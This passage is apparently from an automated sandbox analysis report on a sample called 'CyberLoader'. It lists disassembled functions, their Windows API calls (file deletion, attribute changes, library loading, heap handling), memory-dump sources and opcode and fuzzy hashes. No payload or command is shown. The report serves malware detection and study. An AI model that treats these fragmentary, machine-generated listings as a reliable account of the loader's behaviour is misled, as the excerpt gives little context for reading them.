                                                  • _free.LIBCMT ref: 00298627
                                                    • Part of subcall function 00298518: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,0029C13D,00000000,?,002967E2,?,00000008,?,002989AD,?,?,?), ref: 0029854A
                                                  • HeapReAlloc.KERNEL32(00000000,?,?,?,?,002B0F50,0027CE57,?,?,?,?,?,?), ref: 00298663
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.1642789736.0000000000271000.00000020.00000001.01000000.00000007.sdmp, Offset: 00270000, based on PE: true
                                                  • Associated: 00000003.00000002.1642762885.0000000000270000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642828077.00000000002A3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002AE000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002B4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002D1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642946091.00000000002D2000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_270000_CyberLoader.jbxd
                                                  Similarity
                                                  • API ID: Heap$AllocAllocate_free
                                                  • String ID:
                                                  • API String ID: 2447670028-0
                                                  • Opcode ID: 5f3e9588927e27537b59787c4cb3b5d9387ee31c9ea8fd1ce2e796fdf4da72fd
                                                  • Instruction ID: 24a3a643ce3e8f2e88640834049decf22b824ee01b6a2e9135eaefcbcae76406
                                                  • Opcode Fuzzy Hash: 5f3e9588927e27537b59787c4cb3b5d9387ee31c9ea8fd1ce2e796fdf4da72fd
                                                  • Instruction Fuzzy Hash: 03F0CD32231116AADF212E25AC04F6B276C9F93BA0F2D4126F8289E191DE30CC3099A5
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00280908 Relevance: 3.0, APIs: 2, Instructions: 33COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetCurrentProcess.KERNEL32(?,?), ref: 00280915
                                                  • GetProcessAffinityMask.KERNEL32 ref: 0028091C
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.1642789736.0000000000271000.00000020.00000001.01000000.00000007.sdmp, Offset: 00270000, based on PE: true
                                                  • Associated: 00000003.00000002.1642762885.0000000000270000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642828077.00000000002A3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002AE000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002B4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002D1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642946091.00000000002D2000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_270000_CyberLoader.jbxd
                                                  Similarity
                                                  • API ID: Process$AffinityCurrentMask
                                                  • String ID:
                                                  • API String ID: 1231390398-0
                                                  • Opcode ID: 96cadeb361c3a086548a648e723e85281fc8e6d20ac1e04977c10a79521dd779
                                                  • Instruction ID: 2d3a5162d1ec30b8fb5498ac9b30990ee359660f67220ac05c3dbf7551c3aa13
                                                  • Opcode Fuzzy Hash: 96cadeb361c3a086548a648e723e85281fc8e6d20ac1e04977c10a79521dd779
                                                  • Instruction Fuzzy Hash: 0CE09B37A22106AB6F45DEA49C445FB739DDB057107154179F906D3141F930DD158760
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 002979B7 Relevance: 3.0, APIs: 2, Instructions: 33COMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 0029B610: GetEnvironmentStringsW.KERNEL32 ref: 0029B619
                                                    • Part of subcall function 0029B610: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0029B63C
                                                    • Part of subcall function 0029B610: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0029B662
                                                    • Part of subcall function 0029B610: _free.LIBCMT ref: 0029B675
                                                    • Part of subcall function 0029B610: FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0029B684
                                                  • _free.LIBCMT ref: 002979FD
                                                  • _free.LIBCMT ref: 00297A04
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.1642789736.0000000000271000.00000020.00000001.01000000.00000007.sdmp, Offset: 00270000, based on PE: true
                                                  • Associated: 00000003.00000002.1642762885.0000000000270000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642828077.00000000002A3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002AE000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002B4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002D1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642946091.00000000002D2000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_270000_CyberLoader.jbxd
                                                  Similarity
                                                  • API ID: _free$ByteCharEnvironmentMultiStringsWide$Free
                                                  • String ID:
                                                  • API String ID: 400815659-0
                                                  • Opcode ID: 16212ff49fcd7310de52cf9d45bacffe4a2e6e39dd3b54e219df26c79f61bb51
                                                  • Instruction ID: f88b0a14c741f38f168d859bd4a09dd02dd48c40ae7b9bfa6af67d25aab98faa
                                                  • Opcode Fuzzy Hash: 16212ff49fcd7310de52cf9d45bacffe4a2e6e39dd3b54e219df26c79f61bb51
                                                  • Instruction Fuzzy Hash: 40E0E512A3D41211AF62767A7D0665F0604CF82331B11172BF810DB9C2DE508C320455
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0027A444 Relevance: 3.0, APIs: 2, Instructions: 30COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,0027A27A,?,?,?,0027A113,?,00000001,00000000,?,?), ref: 0027A458
                                                  • SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,0027A27A,?,?,?,0027A113,?,00000001,00000000,?,?), ref: 0027A489
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.1642789736.0000000000271000.00000020.00000001.01000000.00000007.sdmp, Offset: 00270000, based on PE: true
                                                  • Associated: 00000003.00000002.1642762885.0000000000270000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642828077.00000000002A3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002AE000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002B4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002D1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642946091.00000000002D2000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_270000_CyberLoader.jbxd
                                                  Similarity
                                                  • API ID: AttributesFile
                                                  • String ID:
                                                  • API String ID: 3188754299-0
                                                  • Opcode ID: e932e597d060b302ed32d188f9619be915cb0cb597720cd76110e4124c7bdb86
                                                  • Instruction ID: 0f985092e01da7fa3d11565ad0fa3bf11aa2245e088b478f7f1c9481ac7f8f57
                                                  • Opcode Fuzzy Hash: e932e597d060b302ed32d188f9619be915cb0cb597720cd76110e4124c7bdb86
                                                  • Instruction Fuzzy Hash: 81F08C312502097BDF02AE60DC05BEA376CBB05385F04C051BC8C86161DB728AA8AA50
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0028D573 Relevance: 3.0, APIs: 2, Instructions: 29COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.1642789736.0000000000271000.00000020.00000001.01000000.00000007.sdmp, Offset: 00270000, based on PE: true
                                                  • Associated: 00000003.00000002.1642762885.0000000000270000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642828077.00000000002A3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002AE000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002B4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002D1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642946091.00000000002D2000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_270000_CyberLoader.jbxd
                                                  Similarity
                                                  • API ID: ItemText_swprintf
                                                  • String ID:
                                                  • API String ID: 3011073432-0
                                                  • Opcode ID: 40ae95d054103cf4888cc819d8f174d46357847500dc4cf1c4863dd803516037
                                                  • Instruction ID: c97566971dc904185ef247dce2909c992335fa638cfca7f7d59c1300349ed15b
                                                  • Opcode Fuzzy Hash: 40ae95d054103cf4888cc819d8f174d46357847500dc4cf1c4863dd803516037
                                                  • Instruction Fuzzy Hash: CCF05C715213487AEB11BBB09C06FAA376C9B04341F000683B608530F3DE716E308B71
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0027A12D Relevance: 3.0, APIs: 2, Instructions: 28fileCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • DeleteFileW.KERNELBASE(?,?,?,0027984C,?,?,00279688,?,?,?,?,002A1FA1,000000FF), ref: 0027A13E
                                                  • DeleteFileW.KERNEL32(?,?,?,00000800,?,?,0027984C,?,?,00279688,?,?,?,?,002A1FA1,000000FF), ref: 0027A16C
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.1642789736.0000000000271000.00000020.00000001.01000000.00000007.sdmp, Offset: 00270000, based on PE: true
                                                  • Associated: 00000003.00000002.1642762885.0000000000270000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642828077.00000000002A3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002AE000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002B4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002D1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642946091.00000000002D2000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_270000_CyberLoader.jbxd
                                                  Similarity
                                                  • API ID: DeleteFile
                                                  • String ID:
                                                  • API String ID: 4033686569-0
                                                  • Opcode ID: b940e0ec464de1c1663934b6bd3945de78869e37eecd2880b6cce3294ec1abf9
                                                  • Instruction ID: dfdba97f7a63e42d673d60baaeffe67d9cf772ccebe688b56cd8fbf13e778192
                                                  • Opcode Fuzzy Hash: b940e0ec464de1c1663934b6bd3945de78869e37eecd2880b6cce3294ec1abf9
                                                  • Instruction Fuzzy Hash: 3AE0223825020A6BEB01AF70EC05FFA735CBB09381F888061B98CC3060DF318DA4AF90
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0028A39D Relevance: 3.0, APIs: 2, Instructions: 27comCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GdiplusShutdown.GDIPLUS(?,?,?,?,002A1FA1,000000FF), ref: 0028A3D1
                                                  • OleUninitialize.OLE32(?,?,?,?,002A1FA1,000000FF), ref: 0028A3D6
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.1642789736.0000000000271000.00000020.00000001.01000000.00000007.sdmp, Offset: 00270000, based on PE: true
                                                  • Associated: 00000003.00000002.1642762885.0000000000270000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642828077.00000000002A3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002AE000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002B4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002D1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642946091.00000000002D2000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_270000_CyberLoader.jbxd
                                                  Similarity
                                                  • API ID: GdiplusShutdownUninitialize
                                                  • String ID:
                                                  • API String ID: 3856339756-0
                                                  • Opcode ID: 3592024e79a301fabb083c3e75fec45ea71e04efd0172a4116a1f97879ce3ecd
                                                  • Instruction ID: 761652345b713b3c2014d2fd6e85839d928deb509e6d0f7755cac1f58b85ef58
                                                  • Opcode Fuzzy Hash: 3592024e79a301fabb083c3e75fec45ea71e04efd0172a4116a1f97879ce3ecd
                                                  • Instruction Fuzzy Hash: 11F03032518655DFC710DB4CEC05B55FBACFB49B20F04836AF419837A0CB746C10CA91
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0027A194 Relevance: 3.0, APIs: 2, Instructions: 26COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetFileAttributesW.KERNELBASE(?,?,?,0027A189,?,002776B2,?,?,?,?), ref: 0027A1A5
                                                  • GetFileAttributesW.KERNELBASE(?,?,?,00000800,?,0027A189,?,002776B2,?,?,?,?), ref: 0027A1D1
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.1642789736.0000000000271000.00000020.00000001.01000000.00000007.sdmp, Offset: 00270000, based on PE: true
                                                  • Associated: 00000003.00000002.1642762885.0000000000270000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642828077.00000000002A3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002AE000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002B4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002D1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642946091.00000000002D2000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_270000_CyberLoader.jbxd
                                                  Similarity
                                                  • API ID: AttributesFile
                                                  • String ID:
                                                  • API String ID: 3188754299-0
                                                  • Opcode ID: 31134e7a3fa69e5d1d148e1f927b7d241884727d0369bfe142bb2b6181abff15
                                                  • Instruction ID: 43d52f3364422cb558bb52546e30cfdccd2a5b109a916d4fa2e07a44f648232a
                                                  • Opcode Fuzzy Hash: 31134e7a3fa69e5d1d148e1f927b7d241884727d0369bfe142bb2b6181abff15
                                                  • Instruction Fuzzy Hash: 48E092365101285BDB21EB68DC09BE9B75CAB093F1F0182A1FD4CE32A1DB709D649BE0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00280085 Relevance: 3.0, APIs: 2, Instructions: 25libraryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetSystemDirectoryW.KERNEL32(?,00000800), ref: 002800A0
                                                  • LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,0027EB86,Crypt32.dll,00000000,0027EC0A,?,?,0027EBEC,?,?,?), ref: 002800C2
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.1642789736.0000000000271000.00000020.00000001.01000000.00000007.sdmp, Offset: 00270000, based on PE: true
                                                  • Associated: 00000003.00000002.1642762885.0000000000270000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642828077.00000000002A3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002AE000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002B4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002D1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642946091.00000000002D2000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_270000_CyberLoader.jbxd
                                                  Similarity
                                                  • API ID: DirectoryLibraryLoadSystem
                                                  • String ID:
                                                  • API String ID: 1175261203-0
                                                  • Opcode ID: 7324fb96a99a159380b8c825a12735b6135b1d6ae0235c6b4f74aeb0ab4bbde4
                                                  • Instruction ID: d643b7bb9620802ca6c6a534240399408fb3bf0041f07070cd11a848162c103a
                                                  • Opcode Fuzzy Hash: 7324fb96a99a159380b8c825a12735b6135b1d6ae0235c6b4f74aeb0ab4bbde4
                                                  • Instruction Fuzzy Hash: 76E0127691115C6BDB21AAA4AC09FE6776CEF09382F0400A5BA48D3154DA749A548FA0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00289B0F Relevance: 3.0, APIs: 2, Instructions: 24windowCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 00289B30
                                                  • GdipCreateBitmapFromStream.GDIPLUS(?,?), ref: 00289B37
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.1642789736.0000000000271000.00000020.00000001.01000000.00000007.sdmp, Offset: 00270000, based on PE: true
                                                  • Associated: 00000003.00000002.1642762885.0000000000270000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642828077.00000000002A3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002AE000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002B4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002D1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642946091.00000000002D2000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_270000_CyberLoader.jbxd
                                                  Similarity
                                                  • API ID: BitmapCreateFromGdipStream
                                                  • String ID:
                                                  • API String ID: 1918208029-0
                                                  • Opcode ID: 33a0a4a158b28d53e5c4ac82d0bf7a9d61174955a6c1dc35aea9ae128275659b
                                                  • Instruction ID: ef85525cda0d95fabb3a39754dc289e4e8aeba47851478ead9b6bbb5691fe045
                                                  • Opcode Fuzzy Hash: 33a0a4a158b28d53e5c4ac82d0bf7a9d61174955a6c1dc35aea9ae128275659b
                                                  • Instruction Fuzzy Hash: 74E06575422208EFCB10EF94D4016A9B7ECEB04310F14805BEC8493240D7B06E509F91
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0029215C Relevance: 3.0, APIs: 2, Instructions: 19COMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 0029329A: try_get_function.LIBVCRUNTIME ref: 002932AF
                                                  • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0029217A
                                                  • ___vcrt_uninitialize_ptd.LIBVCRUNTIME ref: 00292185
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.1642789736.0000000000271000.00000020.00000001.01000000.00000007.sdmp, Offset: 00270000, based on PE: true
                                                  • Associated: 00000003.00000002.1642762885.0000000000270000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642828077.00000000002A3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002AE000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002B4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002D1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642946091.00000000002D2000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_270000_CyberLoader.jbxd
                                                  Similarity
                                                  • API ID: Value___vcrt____vcrt_uninitialize_ptdtry_get_function
                                                  • String ID:
                                                  • API String ID: 806969131-0
                                                  • Opcode ID: 09239c0a0209d362f1ead2ef9567d6684a91b2e03ffd246dba7b533b0d870cff
                                                  • Instruction ID: 3ec1c5598af1c2decb8318311546d83196daa5431e5639cb8777dcc126e49b1b
                                                  • Opcode Fuzzy Hash: 09239c0a0209d362f1ead2ef9567d6684a91b2e03ffd246dba7b533b0d870cff
                                                  • Instruction Fuzzy Hash: A3D0A928674302B4AC086BB0285A0A833485863BB03E00B86EA288A0D3EE10883D6912
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0028DC67 Relevance: 3.0, APIs: 2, Instructions: 13COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  • DloadLock.DELAYIMP ref: 0028DC73
                                                  • DloadProtectSection.DELAYIMP ref: 0028DC8F
                                                    • Part of subcall function 0028DE67: DloadObtainSection.DELAYIMP ref: 0028DE77
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.1642789736.0000000000271000.00000020.00000001.01000000.00000007.sdmp, Offset: 00270000, based on PE: true
                                                  • Associated: 00000003.00000002.1642762885.0000000000270000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642828077.00000000002A3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002AE000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002B4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002D1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642946091.00000000002D2000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_270000_CyberLoader.jbxd
                                                  Similarity
                                                  • API ID: Dload$Section$LockObtainProtect
                                                  • String ID:
                                                  • API String ID: 731663317-0
                                                  • Opcode ID: bb9cad7746dce7307669403d1e5a0297e9c873137106551cb40e76c94d6dbcce
                                                  • Instruction ID: 4a513911053fcf73337dc173333475c2c075267f1abcc69b6ce2de514833e068
                                                  • Opcode Fuzzy Hash: bb9cad7746dce7307669403d1e5a0297e9c873137106551cb40e76c94d6dbcce
                                                  • Instruction Fuzzy Hash: B5D0C97C9322115AC611BB14A9CA71C23B0B715745FA40603E105865F1DFE44CB8DB05
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 002712E6 Relevance: 3.0, APIs: 2, Instructions: 11COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.1642789736.0000000000271000.00000020.00000001.01000000.00000007.sdmp, Offset: 00270000, based on PE: true
                                                  • Associated: 00000003.00000002.1642762885.0000000000270000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642828077.00000000002A3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002AE000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002B4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002D1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642946091.00000000002D2000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_270000_CyberLoader.jbxd
                                                  Similarity
                                                  • API ID: ItemShowWindow
                                                  • String ID:
                                                  • API String ID: 3351165006-0
                                                  • Opcode ID: d9a108886fd02a1f3e60c6b6124bc371edb6a78af38e0dc1fe829101db9b1c54
                                                  • Instruction ID: dc46570e48776b5e6ccb740a83db40dd63e82cac7bcfb3cb1dc69dd385aa1fd8
                                                  • Opcode Fuzzy Hash: d9a108886fd02a1f3e60c6b6124bc371edb6a78af38e0dc1fe829101db9b1c54
                                                  • Instruction Fuzzy Hash: 5BC01232858281FECB010BB0EC0DD2FBBA8ABA5212F05C90AB2A9C0061C238C818DB11
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 002719A6 Relevance: 1.8, APIs: 1, Instructions: 310COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.1642789736.0000000000271000.00000020.00000001.01000000.00000007.sdmp, Offset: 00270000, based on PE: true
                                                  • Associated: 00000003.00000002.1642762885.0000000000270000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642828077.00000000002A3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002AE000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002B4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002D1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642946091.00000000002D2000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_270000_CyberLoader.jbxd
                                                  Similarity
                                                  • API ID: H_prolog
                                                  • String ID:
                                                  • API String ID: 3519838083-0
                                                  • Opcode ID: 97239df2bfb97ef974969f592e1729a6cc30c162c9be9cd0d0cc1b0ac62a9c76
                                                  • Instruction ID: 2ef010ff7707608be5d262c8fb0d3289d47190aab2e251008213d69d186ba7ad
                                                  • Opcode Fuzzy Hash: 97239df2bfb97ef974969f592e1729a6cc30c162c9be9cd0d0cc1b0ac62a9c76
                                                  • Instruction Fuzzy Hash: BDC1A630A242559FDF15CF6CC485BA97BA5EF06314F0880BADC49DB286CB719D74CB61
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00273B3D Relevance: 1.7, APIs: 1, Instructions: 176COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.1642789736.0000000000271000.00000020.00000001.01000000.00000007.sdmp, Offset: 00270000, based on PE: true
                                                  • Associated: 00000003.00000002.1642762885.0000000000270000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642828077.00000000002A3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002AE000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002B4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002D1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642946091.00000000002D2000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_270000_CyberLoader.jbxd
                                                  Similarity
                                                  • API ID: H_prolog
                                                  • String ID:
                                                  • API String ID: 3519838083-0
                                                  • Opcode ID: 838a4e08c252f7d5554dacecc2924de7c5fc2fece02bb2ec941be0c6a9b819b7
                                                  • Instruction ID: 65dff94f4f035f6fbea7348cfe2fa3be03eef65584a6e41740074096cf66e01d
                                                  • Opcode Fuzzy Hash: 838a4e08c252f7d5554dacecc2924de7c5fc2fece02bb2ec941be0c6a9b819b7
                                                  • Instruction Fuzzy Hash: 8471CC71125F449EDB25DF30CC41AEBB7E9AF14301F44892EE5AE47282DB316A68EF11
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0027837F Relevance: 1.6, APIs: 1, Instructions: 110COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • __EH_prolog.LIBCMT ref: 00278384
                                                    • Part of subcall function 00271380: __EH_prolog.LIBCMT ref: 00271385
                                                    • Part of subcall function 00271380: new.LIBCMT ref: 002713FE
                                                    • Part of subcall function 002719A6: __EH_prolog.LIBCMT ref: 002719AB
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.1642789736.0000000000271000.00000020.00000001.01000000.00000007.sdmp, Offset: 00270000, based on PE: true
                                                  • Associated: 00000003.00000002.1642762885.0000000000270000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642828077.00000000002A3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002AE000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002B4000.00000004.00000001.01000000.00000007.sdmpDownload File
